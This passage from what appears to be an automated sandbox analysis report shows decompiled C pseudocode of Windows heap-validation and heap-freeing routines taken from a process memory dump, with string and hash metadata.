                                                                            				_t267 = 1;
                                                                            				if(_t150 == 0) {
                                                                            					L61:
                                                                            					_t151 =  *[fs:0x30];
                                                                            					__eflags =  *((char*)(_t151 + 2));
                                                                            					if( *((char*)(_t151 + 2)) != 0) {
                                                                            						 *0x1166378 = _t267;
                                                                            						asm("int3");
                                                                            						 *0x1166378 = 0;
                                                                            					}
                                                                            					__eflags = _v12;
                                                                            					if(_v12 != 0) {
                                                                            						_t105 =  &_v16;
                                                                            						 *_t105 = _v16 & 0x00000000;
                                                                            						__eflags =  *_t105;
                                                                            						E010A174B( &_v12,  &_v16, 0x8000);
                                                                            					}
                                                                            					L65:
                                                                            					__eflags = 0;
                                                                            					return 0;
                                                                            				}
                                                                            				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                                            					_t268 =  &(_t331[0x30]);
                                                                            					_v32 = 0;
                                                                            					_t260 =  *_t268;
                                                                            					_t308 = 0;
                                                                            					_v24 = 0;
                                                                            					while(_t268 != _t260) {
                                                                            						_t260 =  *_t260;
                                                                            						_v16 =  *_t325 & 0x0000ffff;
                                                                            						_t156 = _t325[0];
                                                                            						_v28 = _t325;
                                                                            						_v5 = _t156;
                                                                            						__eflags = _t156 & 0x00000001;
                                                                            						if((_t156 & 0x00000001) != 0) {
                                                                            							_t157 =  *[fs:0x30];
                                                                            							__eflags =  *(_t157 + 0xc);
                                                                            							if( *(_t157 + 0xc) == 0) {
                                                                            								_push("HEAP: ");
                                                                            								E0107B150();
                                                                            							} else {
                                                                            								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            							}
                                                                            							_push(_t325);
                                                                            							E0107B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                                            							L32:
                                                                            							_t270 = 0;
                                                                            							__eflags = _t331[0x13];
                                                                            							if(_t331[0x13] != 0) {
                                                                            								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                            							}
                                                                            							L60:
                                                                            							_t267 = _t270 + 1;
                                                                            							__eflags = _t267;
                                                                            							goto L61;
                                                                            						}
                                                                            						_t169 =  *_t325 & 0x0000ffff;
                                                                            						__eflags = _t169 - _t308;
                                                                            						if(_t169 < _t308) {
                                                                            							_t170 =  *[fs:0x30];
                                                                            							__eflags =  *(_t170 + 0xc);
                                                                            							if( *(_t170 + 0xc) == 0) {
                                                                            								_push("HEAP: ");
                                                                            								E0107B150();
                                                                            							} else {
                                                                            								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            							}
                                                                            							E0107B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                                            							goto L32;
                                                                            						} else {
                                                                            							__eflags = _t331[0x13];
                                                                            							_t308 = _t169;
                                                                            							_v24 = _t308;
                                                                            							if(_t331[0x13] != 0) {
                                                                            								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                            								__eflags =  *_t325;
                                                                            							}
                                                                            							_t26 =  &_v32;
                                                                            							 *_t26 = _v32 + 1;
                                                                            							__eflags =  *_t26;
                                                                            							continue;
                                                                            						}
                                                                            					}
                                                                            					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                                            					if( *0x1166350 != 0 && _t331[0x2f] != 0) {
                                                                            						_push(4);
                                                                            						_push(0x1000);
                                                                            						_push( &_v16);
                                                                            						_push(0);
                                                                            						_push( &_v12);
                                                                            						_push(0xffffffff);
                                                                            						if(E010B9660() >= 0) {
                                                                            							_v20 = _v12 + 0x204;
                                                                            						}
                                                                            					}
                                                                            					_t183 =  &(_t331[0x27]);
                                                                            					_t281 = 0x81;
                                                                            					_t326 =  *_t183;
                                                                            					if(_t183 == _t326) {
                                                                            						L49:
                                                                            						_t261 =  &(_t331[0x29]);
                                                                            						_t184 = 0;
                                                                            						_t327 =  *_t261;
                                                                            						_t282 = 0;
                                                                            						_v24 = 0;
                                                                            						_v36 = 0;
                                                                            						__eflags = _t327 - _t261;
                                                                            						if(_t327 == _t261) {
                                                                            							L53:
                                                                            							_t328 = _v32;
                                                                            							_v28 = _t331;
                                                                            							__eflags = _t328 - _t184;
                                                                            							if(_t328 == _t184) {
                                                                            								__eflags = _t331[0x1d] - _t282;
                                                                            								if(_t331[0x1d] == _t282) {
                                                                            									__eflags = _v12;
                                                                            									if(_v12 == 0) {
                                                                            										L82:
                                                                            										_t267 = 1;
                                                                            										__eflags = 1;
                                                                            										goto L83;
                                                                            									}
                                                                            									_t329 = _t331[0x2f];
                                                                            									__eflags = _t329;
                                                                            									if(_t329 == 0) {
                                                                            										L77:
                                                                            										_t330 = _t331[0x22];
                                                                            										__eflags = _t330;
                                                                            										if(_t330 == 0) {
                                                                            											L81:
                                                                            											_t129 =  &_v16;
                                                                            											 *_t129 = _v16 & 0x00000000;
                                                                            											__eflags =  *_t129;
                                                                            											E010A174B( &_v12,  &_v16, 0x8000);
                                                                            											goto L82;
                                                                            										}
                                                                            										_t314 = _t331[0x21] & 0x0000ffff;
                                                                            										_t285 = 1;
                                                                            										__eflags = 1 - _t314;
                                                                            										if(1 >= _t314) {
                                                                            											goto L81;
                                                                            										} else {
                                                                            											goto L79;
                                                                            										}
                                                                            										while(1) {
                                                                            											L79:
                                                                            											_t330 = _t330 + 0x40;
                                                                            											_t332 = _t285 & 0x0000ffff;
                                                                            											_t262 = _v20 + _t332 * 4;
                                                                            											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                                            											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                                            												break;
                                                                            											}
                                                                            											_t285 = _t285 + 1;
                                                                            											__eflags = _t285 - _t314;
                                                                            											if(_t285 < _t314) {
                                                                            												continue;
                                                                            											}
                                                                            											goto L81;
                                                                            										}
                                                                            										_t191 =  *[fs:0x30];
                                                                            										__eflags =  *(_t191 + 0xc);
                                                                            										if( *(_t191 + 0xc) == 0) {
                                                                            											_push("HEAP: ");
                                                                            											E0107B150();
                                                                            										} else {
                                                                            											E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            										}
                                                                            										_push(_t262);
                                                                            										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                                            										_t148 = _t330 + 0x10; // 0x10
                                                                            										_push( *((intOrPtr*)(_t330 + 8)));
                                                                            										E0107B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                                            										L59:
                                                                            										_t270 = 0;
                                                                            										__eflags = 0;
                                                                            										goto L60;
                                                                            									}
                                                                            									_t289 = 1;
                                                                            									__eflags = 1;
                                                                            									while(1) {
                                                                            										_t201 = _v12;
                                                                            										_t329 = _t329 + 0xc;
                                                                            										_t263 = _t289 & 0x0000ffff;
                                                                            										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                                            										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                                            											break;
                                                                            										}
                                                                            										_t289 = _t289 + 1;
                                                                            										__eflags = _t289 - 0x81;
                                                                            										if(_t289 < 0x81) {
                                                                            											continue;
                                                                            										}
                                                                            										goto L77;
                                                                            									}
                                                                            									_t203 =  *[fs:0x30];
                                                                            									__eflags =  *(_t203 + 0xc);
                                                                            									if( *(_t203 + 0xc) == 0) {
                                                                            										_push("HEAP: ");
                                                                            										E0107B150();
                                                                            									} else {
                                                                            										E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            									}
                                                                            									_t291 = _v12;
                                                                            									_push(_t291 + _t263 * 4);
                                                                            									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                                            									_push( *((intOrPtr*)(_t329 + 8)));
                                                                            									E0107B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                                            									goto L59;
                                                                            								}
                                                                            								_t212 =  *[fs:0x30];
                                                                            								__eflags =  *(_t212 + 0xc);
                                                                            								if( *(_t212 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push(_t331[0x1d]);
                                                                            								_push(_v36);
                                                                            								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                                            								L58:
                                                                            								E0107B150();
                                                                            								goto L59;
                                                                            							}
                                                                            							_t220 =  *[fs:0x30];
                                                                            							__eflags =  *(_t220 + 0xc);
                                                                            							if( *(_t220 + 0xc) == 0) {
                                                                            								_push("HEAP: ");
                                                                            								E0107B150();
                                                                            							} else {
                                                                            								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            							}
                                                                            							_push(_t328);
                                                                            							_push(_v24);
                                                                            							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                                            							goto L58;
                                                                            						} else {
                                                                            							goto L50;
                                                                            						}
                                                                            						while(1) {
                                                                            							L50:
                                                                            							_t92 = _t327 - 0x10; // -24
                                                                            							_t282 = _t331;
                                                                            							_t230 = E01134AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                                            							__eflags = _t230;
                                                                            							if(_t230 == 0) {
                                                                            								goto L59;
                                                                            							}
                                                                            							_t327 =  *_t327;
                                                                            							__eflags = _t327 - _t261;
                                                                            							if(_t327 != _t261) {
                                                                            								continue;
                                                                            							}
                                                                            							_t184 = _v24;
                                                                            							_t282 = _v36;
                                                                            							goto L53;
                                                                            						}
                                                                            						goto L59;
                                                                            					} else {
                                                                            						while(1) {
                                                                            							_t39 = _t326 + 0x18; // 0x10
                                                                            							_t264 = _t39;
                                                                            							if(_t331[0x13] != 0) {
                                                                            								_t319 = _t331[0x14] ^  *_t264;
                                                                            								 *_t264 = _t319;
                                                                            								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                                            								_t348 = _t319 >> 0x18 - _t303;
                                                                            								if(_t319 >> 0x18 != _t303) {
                                                                            									_push(_t303);
                                                                            									E0112FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                                            								}
                                                                            								_t281 = 0x81;
                                                                            							}
                                                                            							_t317 = _v20;
                                                                            							if(_t317 != 0) {
                                                                            								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                                            								_t350 = _t241;
                                                                            								if(_t350 != 0) {
                                                                            									if(_t350 >= 0) {
                                                                            										__eflags = _t241 & 0x00000800;
                                                                            										if(__eflags == 0) {
                                                                            											__eflags = _t241 - _t331[0x21];
                                                                            											if(__eflags < 0) {
                                                                            												_t298 = _t241;
                                                                            												_t65 = _t317 + _t298 * 4;
                                                                            												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                                            												__eflags =  *_t65;
                                                                            											}
                                                                            										}
                                                                            									} else {
                                                                            										_t244 = _t241 & 0x00007fff;
                                                                            										if(_t244 < _t281) {
                                                                            											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E011223E3(_t331, _t264) == 0) {
                                                                            								break;
                                                                            							}
                                                                            							if(_t331[0x13] != 0) {
                                                                            								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                                            								 *_t264 =  *_t264 ^ _t331[0x14];
                                                                            							}
                                                                            							_t326 =  *_t326;
                                                                            							if( &(_t331[0x27]) == _t326) {
                                                                            								goto L49;
                                                                            							} else {
                                                                            								_t281 = 0x81;
                                                                            								continue;
                                                                            							}
                                                                            						}
                                                                            						__eflags = _t331[0x13];
                                                                            						if(_t331[0x13] != 0) {
                                                                            							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                                            							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                                            						}
                                                                            						goto L65;
                                                                            					}
                                                                            				} else {
                                                                            					L83:
                                                                            					return _t267;
                                                                            				}
                                                                            			}



























































                                                                            0x0113472c
                                                                            0x01134738
                                                                            0x0113473c
                                                                            0x0113474b
                                                                            0x01134751
                                                                            0x01134751
                                                                            0x00000000
                                                                            0x0113473c
                                                                            0x011348f4
                                                                            0x011348f4
                                                                            0x00000000
                                                                            0x011348f4

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                            • API String ID: 0-1357697941
                                                                            • Opcode ID: b3abe936e9d9191cdd2fd71e26c5bf1e431c15eef90700cfdf372056366326c3
                                                                            • Instruction ID: d7471528c507e2e9e2fd898a98e9abb168343af3357c3d44898cbecb3b137df0
                                                                            • Opcode Fuzzy Hash: b3abe936e9d9191cdd2fd71e26c5bf1e431c15eef90700cfdf372056366326c3
                                                                            • Instruction Fuzzy Hash: 33F17531A00646DFDB29CFA9C480BBAFBF5FF89304F448069E5869BA45D730A985CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            			E0109A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                                            				char _v8;
                                                                            				signed short _v12;
                                                                            				signed short _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed short _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				signed int _v48;
                                                                            				unsigned int _v52;
                                                                            				signed int _v56;
                                                                            				void* _v60;
                                                                            				intOrPtr _v64;
                                                                            				void* _v72;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __ebp;
                                                                            				unsigned int _t246;
                                                                            				signed char _t247;
                                                                            				signed short _t249;
                                                                            				unsigned int _t256;
                                                                            				signed int _t262;
                                                                            				signed int _t265;
                                                                            				signed int _t266;
                                                                            				signed int _t267;
                                                                            				intOrPtr _t270;
                                                                            				signed int _t280;
                                                                            				signed int _t286;
                                                                            				signed int _t289;
                                                                            				intOrPtr _t290;
                                                                            				signed int _t291;
                                                                            				signed int _t317;
                                                                            				signed short _t320;
                                                                            				intOrPtr _t327;
                                                                            				signed int _t339;
                                                                            				signed int _t344;
                                                                            				signed int _t347;
                                                                            				intOrPtr _t348;
                                                                            				signed int _t350;
                                                                            				signed int _t352;
                                                                            				signed int _t353;
                                                                            				signed int _t356;
                                                                            				intOrPtr _t357;
                                                                            				intOrPtr _t366;
                                                                            				signed int _t367;
                                                                            				signed int _t370;
                                                                            				intOrPtr _t371;
                                                                            				signed int _t372;
                                                                            				signed int _t394;
                                                                            				signed short _t402;
                                                                            				intOrPtr _t404;
                                                                            				intOrPtr _t415;
                                                                            				signed int _t430;
                                                                            				signed int _t433;
                                                                            				signed int _t437;
                                                                            				signed int _t445;
                                                                            				signed short _t446;
                                                                            				signed short _t449;
                                                                            				signed short _t452;
                                                                            				signed int _t455;
                                                                            				signed int _t460;
                                                                            				signed short* _t468;
                                                                            				signed int _t480;
                                                                            				signed int _t481;
                                                                            				signed int _t483;
                                                                            				intOrPtr _t484;
                                                                            				signed int _t491;
                                                                            				unsigned int _t506;
                                                                            				unsigned int _t508;
                                                                            				signed int _t513;
                                                                            				signed int _t514;
                                                                            				signed int _t521;
                                                                            				signed short* _t533;
                                                                            				signed int _t541;
                                                                            				signed int _t543;
                                                                            				signed int _t546;
                                                                            				unsigned int _t551;
                                                                            				signed int _t553;
                                                                            
                                                                            				_t450 = __ecx;
                                                                            				_t553 = __ecx;
                                                                            				_t539 = __edx;
                                                                            				_v28 = 0;
                                                                            				_v40 = 0;
                                                                            				if(( *(__ecx + 0xcc) ^  *0x1168a68) != 0) {
                                                                            					_push(_a4);
                                                                            					_t513 = __edx;
                                                                            					L11:
                                                                            					_t246 = E0109A830(_t450, _t513);
                                                                            					L7:
                                                                            					return _t246;
                                                                            				}
                                                                            				if(_a8 != 0) {
                                                                            					__eflags =  *(__edx + 2) & 0x00000008;
                                                                            					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                                            						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                                            						_t430 = E0109DF24(__edx,  &_v12,  &_v16);
                                                                            						__eflags = _t430;
                                                                            						if(_t430 != 0) {
                                                                            							_t157 = _t553 + 0x234;
                                                                            							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                                            							__eflags =  *_t157;
                                                                            						}
                                                                            					}
                                                                            					_t445 = _a4;
                                                                            					_t514 = _t539;
                                                                            					_v48 = _t539;
                                                                            					L14:
                                                                            					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                                            					__eflags = _t247;
                                                                            					if(_t247 == 0) {
                                                                            						_t541 = _t553;
                                                                            					} else {
                                                                            						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                                            						__eflags = _t541;
                                                                            					}
                                                                            					_t249 = 7 + _t445 * 8 + _t514;
                                                                            					_v12 = _t249;
                                                                            					__eflags =  *_t249 - 3;
                                                                            					if( *_t249 == 3) {
                                                                            						_v16 = _t514 + _t445 * 8 + 8;
                                                                            						E01079373(_t553, _t514 + _t445 * 8 + 8);
                                                                            						_t452 = _v16;
                                                                            						_v28 =  *(_t452 + 0x10);
                                                                            						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                                            						_v36 =  *(_t452 + 0x14);
                                                                            						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                                            						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                                                            						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                                            						_t256 =  *(_t452 + 0x14);
                                                                            						__eflags = _t256 - 0x7f000;
                                                                            						if(_t256 >= 0x7f000) {
                                                                            							_t142 = _t553 + 0x1ec;
                                                                            							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                                            							__eflags =  *_t142;
                                                                            							_t256 =  *(_t452 + 0x14);
                                                                            						}
                                                                            						_t513 = _v48;
                                                                            						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                                            						_a4 = _t445;
                                                                            						_v40 = 1;
                                                                            					} else {
                                                                            						_t27 =  &_v36;
                                                                            						 *_t27 = _v36 & 0x00000000;
                                                                            						__eflags =  *_t27;
                                                                            					}
                                                                            					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                                            					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                                            						_v44 = _t513;
                                                                            						_t262 = E0107A9EF(_t541, _t513);
                                                                            						__eflags = _a8;
                                                                            						_v32 = _t262;
                                                                            						if(_a8 != 0) {
                                                                            							__eflags = _t262;
                                                                            							if(_t262 == 0) {
                                                                            								goto L19;
                                                                            							}
                                                                            						}
                                                                            						__eflags =  *0x1168748 - 1;
                                                                            						if( *0x1168748 >= 1) {
                                                                            							__eflags = _t262;
                                                                            							if(_t262 == 0) {
                                                                            								_t415 =  *[fs:0x30];
                                                                            								__eflags =  *(_t415 + 0xc);
                                                                            								if( *(_t415 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push("(UCRBlock != NULL)");
                                                                            								E0107B150();
                                                                            								__eflags =  *0x1167bc8;
                                                                            								if( *0x1167bc8 == 0) {
                                                                            									__eflags = 1;
                                                                            									E01132073(_t445, 1, _t541, 1);
                                                                            								}
                                                                            								_t513 = _v48;
                                                                            								_t445 = _a4;
                                                                            							}
                                                                            						}
                                                                            						_t350 = _v40;
                                                                            						_t480 = _t445 << 3;
                                                                            						_v20 = _t480;
                                                                            						_t481 = _t480 + _t513;
                                                                            						_v24 = _t481;
                                                                            						__eflags = _t350;
                                                                            						if(_t350 == 0) {
                                                                            							_t481 = _t481 + 0xfffffff0;
                                                                            							__eflags = _t481;
                                                                            						}
                                                                            						_t483 = (_t481 & 0xfffff000) - _v44;
                                                                            						__eflags = _t483;
                                                                            						_v52 = _t483;
                                                                            						if(_t483 == 0) {
                                                                            							__eflags =  *0x1168748 - 1;
                                                                            							if( *0x1168748 < 1) {
                                                                            								goto L9;
                                                                            							}
                                                                            							__eflags = _t350;
                                                                            							goto L146;
                                                                            						} else {
                                                                            							_t352 = E010A174B( &_v44,  &_v52, 0x4000);
                                                                            							__eflags = _t352;
                                                                            							if(_t352 < 0) {
                                                                            								goto L94;
                                                                            							}
                                                                            							_t353 = E01097D50();
                                                                            							_t447 = 0x7ffe0380;
                                                                            							__eflags = _t353;
                                                                            							if(_t353 != 0) {
                                                                            								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            							} else {
                                                                            								_t356 = 0x7ffe0380;
                                                                            							}
                                                                            							__eflags =  *_t356;
                                                                            							if( *_t356 != 0) {
                                                                            								_t357 =  *[fs:0x30];
                                                                            								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                                            								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                                            									E011314FB(_t447, _t553, _v44, _v52, 5);
                                                                            								}
                                                                            							}
                                                                            							_t358 = _v32;
                                                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                            							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                                            							__eflags = _t484 - 0x7f000;
                                                                            							if(_t484 >= 0x7f000) {
                                                                            								_t90 = _t553 + 0x1ec;
                                                                            								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                                            								__eflags =  *_t90;
                                                                            							}
                                                                            							E01079373(_t553, _t358);
                                                                            							_t486 = _v32;
                                                                            							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                                            							E01079819(_t486);
                                                                            							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                                            							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                                            							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                                            							__eflags = _t366 - 0x7f000;
                                                                            							if(_t366 >= 0x7f000) {
                                                                            								_t104 = _t553 + 0x1ec;
                                                                            								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                                            								__eflags =  *_t104;
                                                                            							}
                                                                            							__eflags = _v40;
                                                                            							if(_v40 == 0) {
                                                                            								_t533 = _v52 + _v44;
                                                                            								_v32 = _t533;
                                                                            								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                            								__eflags = _v24 - _v52 + _v44;
                                                                            								if(_v24 == _v52 + _v44) {
                                                                            									__eflags =  *(_t553 + 0x4c);
                                                                            									if( *(_t553 + 0x4c) != 0) {
                                                                            										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                                            										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                                            									}
                                                                            								} else {
                                                                            									_t449 = 0;
                                                                            									_t533[3] = 0;
                                                                            									_t533[1] = 0;
                                                                            									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                                            									_t491 = _t394;
                                                                            									 *_t533 = _t394;
                                                                            									__eflags =  *0x1168748 - 1; // 0x0
                                                                            									if(__eflags >= 0) {
                                                                            										__eflags = _t491 - 1;
                                                                            										if(_t491 <= 1) {
                                                                            											_t404 =  *[fs:0x30];
                                                                            											__eflags =  *(_t404 + 0xc);
                                                                            											if( *(_t404 + 0xc) == 0) {
                                                                            												_push("HEAP: ");
                                                                            												E0107B150();
                                                                            											} else {
                                                                            												E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            											}
                                                                            											_push("((LONG)FreeEntry->Size > 1)");
                                                                            											E0107B150();
                                                                            											_pop(_t491);
                                                                            											__eflags =  *0x1167bc8 - _t449; // 0x0
                                                                            											if(__eflags == 0) {
                                                                            												__eflags = 0;
                                                                            												_t491 = 1;
                                                                            												E01132073(_t449, 1, _t541, 0);
                                                                            											}
                                                                            											_t533 = _v32;
                                                                            										}
                                                                            									}
                                                                            									_t533[1] = _t449;
                                                                            									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                            									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                                            										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                                            										_v16 = _t402;
                                                                            										__eflags = _t402 - 0xfe;
                                                                            										if(_t402 >= 0xfe) {
                                                                            											_push(_t491);
                                                                            											_push(_t449);
                                                                            											E0113A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                                            											_t533 = _v48;
                                                                            											_t402 = _v32;
                                                                            										}
                                                                            										_t449 = _t402;
                                                                            									}
                                                                            									_t533[3] = _t449;
                                                                            									E0109A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                                            									_t447 = 0x7ffe0380;
                                                                            								}
                                                                            							}
                                                                            							_t367 = E01097D50();
                                                                            							__eflags = _t367;
                                                                            							if(_t367 != 0) {
                                                                            								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            							} else {
                                                                            								_t370 = _t447;
                                                                            							}
                                                                            							__eflags =  *_t370;
                                                                            							if( *_t370 != 0) {
                                                                            								_t371 =  *[fs:0x30];
                                                                            								__eflags =  *(_t371 + 0x240) & 1;
                                                                            								if(( *(_t371 + 0x240) & 1) != 0) {
                                                                            									__eflags = E01097D50();
                                                                            									if(__eflags != 0) {
                                                                            										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                            									}
                                                                            									E01131411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                                            								}
                                                                            							}
                                                                            							_t372 = E01097D50();
                                                                            							_t546 = 0x7ffe038a;
                                                                            							_t446 = 0x230;
                                                                            							__eflags = _t372;
                                                                            							if(_t372 != 0) {
                                                                            								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                            							} else {
                                                                            								_t246 = 0x7ffe038a;
                                                                            							}
                                                                            							__eflags =  *_t246;
                                                                            							if( *_t246 == 0) {
                                                                            								goto L7;
                                                                            							} else {
                                                                            								__eflags = E01097D50();
                                                                            								if(__eflags != 0) {
                                                                            									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                                            									__eflags = _t546;
                                                                            								}
                                                                            								_push( *_t546 & 0x000000ff);
                                                                            								_push(_v36);
                                                                            								_push(_v40);
                                                                            								goto L120;
                                                                            							}
                                                                            						}
                                                                            					} else {
                                                                            						L19:
                                                                            						_t31 = _t513 + 0x101f; // 0x101f
                                                                            						_t455 = _t31 & 0xfffff000;
                                                                            						_t32 = _t513 + 0x28; // 0x28
                                                                            						_v44 = _t455;
                                                                            						__eflags = _t455 - _t32;
                                                                            						if(_t455 == _t32) {
                                                                            							_t455 = _t455 + 0x1000;
                                                                            							_v44 = _t455;
                                                                            						}
                                                                            						_t265 = _t445 << 3;
                                                                            						_v24 = _t265;
                                                                            						_t266 = _t265 + _t513;
                                                                            						__eflags = _v40;
                                                                            						_v20 = _t266;
                                                                            						if(_v40 == 0) {
                                                                            							_t266 = _t266 + 0xfffffff0;
                                                                            							__eflags = _t266;
                                                                            						}
                                                                            						_t267 = _t266 & 0xfffff000;
                                                                            						_v52 = _t267;
                                                                            						__eflags = _t267 - _t455;
                                                                            						if(_t267 < _t455) {
                                                                            							__eflags =  *0x1168748 - 1; // 0x0
                                                                            							if(__eflags < 0) {
                                                                            								L9:
                                                                            								_t450 = _t553;
                                                                            								L10:
                                                                            								_push(_t445);
                                                                            								goto L11;
                                                                            							}
                                                                            							__eflags = _v40;
                                                                            							L146:
                                                                            							if(__eflags == 0) {
                                                                            								goto L9;
                                                                            							}
                                                                            							_t270 =  *[fs:0x30];
                                                                            							__eflags =  *(_t270 + 0xc);
